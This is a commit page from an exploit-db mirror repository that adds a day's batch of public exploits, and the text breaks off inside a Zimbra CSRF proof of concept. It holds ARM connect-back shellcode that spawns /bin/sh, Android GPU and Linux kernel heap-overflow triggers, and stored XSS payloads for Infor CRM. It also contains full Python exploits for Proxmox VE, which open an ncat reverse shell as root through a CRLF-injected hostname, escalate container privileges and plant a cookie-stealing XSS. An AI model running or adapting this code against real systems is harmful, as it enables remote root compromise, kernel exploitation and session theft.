bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-02-27

Browse source 
12 new exploits
This commit is contained in:
Offensive Security 2016-02-27 05:02:14 +00:00
parent 9eb7ef4903
commit 62a54b60c6
13 changed files with 1479 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -35698,6 +35698,7 @@ id,file,description,date,author,platform,type,port
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
39458,platforms/php/webapps/39458.txt,"OCS Inventory NG <= 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
39461,platforms/multiple/dos/39461.txt,"Adobe Flash -TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0
@ -35733,3 +35734,14 @@ id,file,description,date,author,platform,type,port
39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino <= R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0
39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to {ip:port} with /bin/sh - 95 bytes",2016-02-26,Xeon,arm,shellcode,0
39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0
39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection Vulnerability",2016-02-26,"xevil and Blankon33",php,webapps,80
39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0
39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - CSRF Vulnerability",2016-02-26,Sysdream,linux,webapps,443
39501,platforms/php/webapps/39501.txt,"Centreon <= 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0
39502,platforms/linux/dos/39502.py,"GpicView 0.2.5 - Crash PoC",2016-02-26,"David Silveiro",linux,dos,0
39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0
39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0
39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0
39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80

Can't render this file because it is too large.

91
platforms/android/dos/39504.c Executable file
View file

@ -0,0 +1,91 @@
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=734
The Adreno GPU driver for the MSM Linux kernel contains a heap
overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
results from an incorrect conversion to a signed type when calculating
the minimum count value for the query option. This results in a
negative integer being used to calculate the size of a buffer, which
can result in an integer overflow and a small sized allocation on
32-bit systems:
int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
unsigned int groupid, unsigned int __user *countables,
unsigned int count, unsigned int *max_counters)
{
...
if (countables == NULL || count == 0) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return 0;
}
t = min_t(int, group->reg_count, count);
buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
if (buf == NULL) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return -ENOMEM;
}
for (i = 0; i < t; i++)
buf[i] = group->regs[i].countable;
Note that the "count" parameter is fully controlled. Setting count =
0x80000001 will result in min_t returning 0x80000001 for "t", and
kmalloc allocating a buffer of size 0x4. The loop will then overflow
"buf" because "t" is unsigned, i.e. a large positive value.
The bug was added in the following commit:
https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
is attached. On Android devices /dev/kgsl-3d0 is typically accessible
in an untrusted app domain, so if exploited this issue could be used
for local privilege escalation.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
struct kgsl_perfcounter_query {
unsigned int groupid;
unsigned int *countables;
unsigned int count;
unsigned int max_counters;
unsigned int __pad[2];
};
#define KGSL_IOC_TYPE 0x09
#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
int main(void) {
int fd;
struct kgsl_perfcounter_query data;
unsigned int countables[16];
fd = open("/dev/kgsl-3d0", O_RDWR);
if (fd == -1) {
perror("open");
return -1;
}
memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
data.groupid = 1;
data.countables = (unsigned int *) &countables;
data.count = 0x80000001;
ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);
close(fd);
return 0;
}

37
platforms/arm/shellcode/39496.c Executable file
View file

@ -0,0 +1,37 @@
/*
Title : Linux/ARM - Connect back to {ip:port} with /bin/sh
Length : 95 bytes
Date : 2014-06-03
Author : Xeon
Tested : ARM1176 rev6 (v6l)
*/
#include <stdio.h>
#include <string.h>
char *shellcode = "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x92\x1a\x90\x1a\x17\x27\x01\xdf"
"\x02\x20\x41\x1e\x82\x1e\x07\x02\xe7\x3f\x01\xdf\x05\x1c\x01\xac"
"\x02\x21\x21\x60\x02\x34\x05\x21\x21\x70\x01\x34\x39\x21\x21\x70"
"\x0a\x21\x02\x91\x04\x34\x21\x70\x01\xa9\x10\x22\x02\x37\x01\xdf"
"\xdc\x3f\x02\x21\x28\x1c\x01\xdf\x01\x39\xfb\xd5\x49\x1a\x92\x1a"
"\x0b\x27\x01\xa0\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x73\x68"; /* 10.0.0.10:1337 */
int main()
{
__asm__ ( "eor r0, r0\n\t"
"sub r0, #1\n\t"
"mov r1, r0\n\t"
"mov r2, r0\n\t"
"mov r3, r0\n\t"
"mov r4, r0\n\t"
"mov r5, r0\n\t"
"mov r6, r0\n\t"
"mov r7, r0\n\t");
printf("Shellcode length: %d\n", strlen(shellcode));
printf("Running shellcode...\n");
(*(void(*)()) shellcode)();
printf("Failed!\n");
return 0;
}

175
platforms/ashx/webapps/39497.txt Executable file
View file

@ -0,0 +1,175 @@

Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136
Summary: Infor® CRM, formerly Saleslogix, is an award-winning
customer relationship management (CRM) solution that provides
a complete view of customer interactions, so your business can
collaborate and respond promptly and knowledgably to customer
inquiries, sales opportunities, and service requests. Infor CRM
includes a robust suite of sales, marketing, and service capabilities,
to offer businesses of all sizes a fast, flexible, and affordable
solution for finding, winning, and growing profitable customer
relationships.
Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
21.01.2016
---
----------------------------------
Affected parameter(s): description
----------------------------------
PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}
-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
ChangeKey: null
CreateSource: null
ForeignId1: null
ForeignId2: null
ForeignId3: null
ForeignId4: null
GlobalSyncId: null
ProjectId: null
Tick: null
UserDef1: null
UserDef2: null
UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
$descriptor: "Userovich, User"
$key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"

48
platforms/linux/dos/39502.py Executable file
View file

@ -0,0 +1,48 @@
#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
#Example: python POC.py [image-file]
from sys import argv
from subprocess import Popen
from shlex import split
from time import sleep
import shutil
def DOS(arg):
#"""------------------------------------"""#
command = 'gpicview ' + arg[1] #''' Recieve file & construct Popen '''#
command_2 = split(command) #"""------------------------------------"""#
#"|" "|"#
Popen(command_2) #""" Open file with Gpicview """#
#"""------------------------------------"""#
print("Required: You have 15 seconds")
print("to click on preferences, and ")
print("check 'Auto Save Images' ")
sleep(15)
#"""------------------------------------"""#
buffer = 'A' * 70 + '.png' #"|" Rename image with Buffer "|"#
shutil.move(arg[1], buffer) #"""------------------------------------"""#
def main():
print("Author: David Silveiro ")
print("Company: Xino.co.uk ")
print(" POC Gpicview DOS ")
DOS(argv)
print("File ready for overflow ")
print("Now simply rotate the image")
if __name__ == "__main__":
main()

97
platforms/linux/dos/39505.c Executable file
View file

@ -0,0 +1,97 @@
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=735
In certain kernel versions it is possible to use the AIO subsystem (io_submit syscall) to pass size values larger than MAX_RW_COUNT to the networking subsystem's sendmsg implementation. In the L2TP PPP sendmsg implementation, a large size parameter can lead to an integer overflow and kernel heap corruption during socket buffer allocation. This could be exploited to allow local privilege escalation from an unprivileged user account.
This issue affects 64-bit systems running older branches of the Linux kernel, such as version 3.10 and 3.18. More recent major versions aren't affected due to refactoring in the AIO subsystem. The attached proof-of-concept trigger has been tested on a fully updated Ubuntu 14.04 LTS server. This issue is also likely to affect 64-bit Android devices, which typically use branches of 3.10.
The first observation is that an IOCB_CMD_PWRITE of a large length (such as 0xffffffff) will correctly bound the request iocb's ki_nbytes value to MAX_RW_COUNT. However, in the single vector case, if the relevant access_ok check passes in aio_setup_single_vector then the iov length will still be large (0xffffffff). On 64-bit systems it is possible for access_ok(type, user_ptr, 0xffffffff) to succeed.
The second observation is that sock_aio_write does not use the iocb for the sendmsg size calculation, but instead takes the summation of all input iov lengths. Thus calling io_submit with an IOCB_CMD_PWRITE operation on a socket will result in a potentially large value being passed to sendmsg.
The third observation is that AF_PPPOX sockets using the PX_PROTO_OL2TP protocol has a sendmsg implementation that does not bounds check the incoming length parameter (called total_len) before using the value to calculate the length of a socket buffer allocation (using sock_wmalloc).
The fourth observation is that the underlying socket buffer allocation routine __alloc_skb uses an "unsigned int" for it's size parameter rather than a size_t, and that this value can wrap to a small positive value upon alignment calculations and internal space overhead calculations. This results in a small value being passed to kmalloc for the socket buffer data allocation. Then, the size is recalculated using SKB_WITH_OVERHEAD, which effectively re-underflows the size calculation to a small negative value (large unsigned value). The newly created socket buffer has a small backing data buffer and a large size.
The proof-of-concept trigger crashes when writing the skb_shared_info structure into the end of the socket buffer, which is out-of-bounds. Other corruption may also be possible in pppol2tp_sendmsg/l2tp_xmit_skb/ip_output.
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>
int main(int argc, char *argv[]) {
struct sockaddr_pppol2tp sax;
struct sockaddr_in addr;
int s, sfd, ret;
struct iocb *iocbp;
struct iocb iocb;
aio_context_t ctx_id = 0;
void *data;
s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (s == -1) {
perror("socket");
return -1;
}
memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = -1;
sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = addr.sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = -1;
sax.pppol2tp.s_session = 0;
sax.pppol2tp.d_tunnel = -1;
sax.pppol2tp.d_session = 0;
sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));
if (sfd == -1) {
perror("connect");
return -1;
}
data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (data == MAP_FAILED) {
perror("mmap");
return -1;
}
memset(data, 0x41, 0x100001000);
ret = syscall(__NR_io_setup, 2, &ctx_id);
if (ret == -1) {
perror("io_setup");
return -1;
}
memset(&iocb, 0, sizeof(struct iocb));
iocb.aio_fildes = s;
iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
iocb.aio_nbytes = 0xfffffe60;
iocb.aio_buf = (unsigned long) &data;
iocbp = &iocb;
syscall(__NR_io_submit, ctx_id, 1, &iocbp);
return 0;
}

465
platforms/linux/remote/39499.txt Executable file
View file

@ -0,0 +1,465 @@
=====================================================================
Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS,
Privileges escalation)
=====================================================================
Description
===========
Proxmox is a popular virtualization solution based on KVM and Linux
containers.
A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and
Proxmox VE 4 beta 1 (LXC) in the
virtual machine creating form allowing authenticated remote users to
overwrite configuration files settings.
Configuration file overwriting
==============================
Because the Proxmox VE application doesn't check the
user-provided "hostname" POST parameter, it's
possible to overwrite configuration files using a CRLF injection.
In Proxmox VE 3, we successfully gained access to the host filesystem
from a container and elevated our container capabilities, allowing us to
obtain user credentials and sniff the network.
In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we
successfully gained root privileges on the host.
It's also possible to exploit Proxmox clusters.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-915
Proof of Concept
----------------
The following exploit works for Proxmox VE 4 beta 1. The
lxc.hook.pre-start configuration variable is used to trigger the ncat
reverse-shell payload when the container is started.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
from time import sleep
def exploit(target, username, password, vmid, template, realm,
reverse, hostname):
payload = "ncat %s %s -e /bin/sh" % reverse
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpulimit": 1,
"cpuunits": 1024,
"net0":"name=eth0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Container Created... (Sleeping 20 seconds)"
sleep(20)
print "[+] Starting container..."
startcontainer =
requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" %
(target, hostname, vmid), verify=False, headers={"CSRFPreventionToken":
csrfticket}, cookies={"PVEAuthCookie": ticket})
if startcontainer.status_code == 200:
response = startcontainer.json()
if "success" in response and response["success"]:
print "[+] Exploit should be working..."
else:
print "[!] Can't start container ! Try to
start it manually."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
def handler(lport):
print "[~] Starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "[+] Connection from %s" % addr[0]
t.sock = conn
print "[+] Pop the shell ! :)"
t.interact()
if __name__ == "__main__":
print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas
Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--localhost", required=True, help="Local
host IP for the connect-back shell.")
parser.add_argument("--localport", required=True, type=int,
help="Local port for local bind handler")
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor "
"(default :
local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
parser.add_argument("--hostname", required=True, help="The
target hostname")
args = parser.parse_args()
handlerthr = Thread(target=handler, args=(args.localport,))
handlerthr.start()
exploitthr = Thread(target=exploit, args=(args.target,
args.username, args.password, args.vmid, args.template, args.realm,
(args.localhost, args.localport), args.hostname))
exploitthr.start()
handlerthr.join()
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
remoteroot.py --target 10.25.0.101:8006 --username nicolas --password
pveuser --localhost 10.25.0.10 --localport 9999 --vmid 456 --realm pve
--hostname pve4
[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain
<n.chatelain[at]sysdream.com>
[~] Starting handler on port 9999
[~] Obtaining authorization key...
[+] Authentication success.
[+] Container Created... (Sleeping 20 seconds)
[+] Exploit should be working...
[+] Connection from 10.25.0.101
[+] Pop the shell !
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
The following exploit works for Proxmox VE 3. This proof of concept
mount the host /dev/dm-0 on the container and add multiples capabilities
on the container.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
def exploit(target, username, password, vmid, template, realm,
hostname):
payload = "sysdream\"\nDEVNODES=\"dm-0:r
\"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on,
dac_override:on\"\n#"
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname": payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpus": 1,
"netif":"ifname=eth0,bridge=vmbr0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Countainer (Capabilities + DM-0 Mount)
Created."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
if __name__ == "__main__":
print "[~] Proxmox VE 3 Authenticated Privileges Escalation
Exploit - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--hostname", required=True, help="The
target hostname")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
args = parser.parse_args()
exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.hostname)
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
privescalation.py --username root --password sysofdream --vmid 123
--realm pam --target 10.25.0.110:8006 --hostname pve3
[~] Proxmox VE 3 Authenticated Privileges Escalation Exploit -
Nicolas Chatelain <n.chatelain[at]sysdream.com>
[~] Obtaining authorization key...
[+] Authentication success.
[+] Countainer (Capabilities + DM-0 Mount) Created.
-- On container :
root@sysdream:/# ls -lah /dev/dm-0
brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0
---
Stored Cross-Site Scripting
===========================
Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1.
**Access Vector**: remote
**Security Risk**: high
Proof of Concept
----------------
The following exploit will create a stored XSS displaying the user
cookies and the PVE CSRFPreventionToken.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
def exploit(target, username, password, vmid, template, realm,
version, hostname):
payload =
"eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))"
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
if version == "4":
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"<img/src='x'/onerror=%s>" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpulimit": 1,
"cpuunits": 1024,
"net0":"name=eth0"})
elif version == "3":
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken": csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"<img/src='x'/onerror=%s>" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpus": 1,
"netif":"ifname=eth0,bridge=vmbr0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Stored XSS Created."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
if __name__ == "__main__":
print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting -
Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
parser.add_argument("--version", default="3", choices=["3",
"4"], help="The Proxmox version to exploit")
parser.add_argument("--hostname", required=True, help="The
target hostname")
args = parser.parse_args()
exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.version, args.hostname)
---------------
Vulnerable code
---------------
The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for
Proxmox 4.
For Proxmox 3, the vulnerable code is located in
/usr/share/perl5/PVE/OpenVZ.pm.
--------
Solution
--------
Proxmox 4 : Update to pve-container 0.9-22
Proxmox 3 : Update to pve-manager 3.4-10
Timeline (dd/mm/yyyy)
=====================
04/09/2015 : Initial discovery.
17/09/2015 : Contact with proxmox team.
18/09/2015 : Proxmox fixes the vulnerabilities.
18/09/2015 : Proxmox releases a new pve-container version (0.9-22)
18/09/2015 : Proxmox releases a new pve-manager version (3.4-10)
Affected versions
=================
* Proxmox VE 4
* Proxmox VE 3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

79
platforms/linux/webapps/39500.txt Executable file
View file

@ -0,0 +1,79 @@
======================================
Multiple CSRF in Zimbra Mail interface
======================================
CVE-2015-6541
Description
===========
Multiple CSRF vulnerabilities have been found in the Mail interface of
Zimbra 8.0.9 GA Release, enabling to change account
preferences like e-mail forwarding.
CSRF
====
Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because of the lack of a CSRF token identifying a valid session.
As a consequence, requests can be forged and played arbitrarily.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-352
**CVSS Base score**: 5.8
----------------
Proof of Concept
----------------
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
<input name='<soap:Envelope
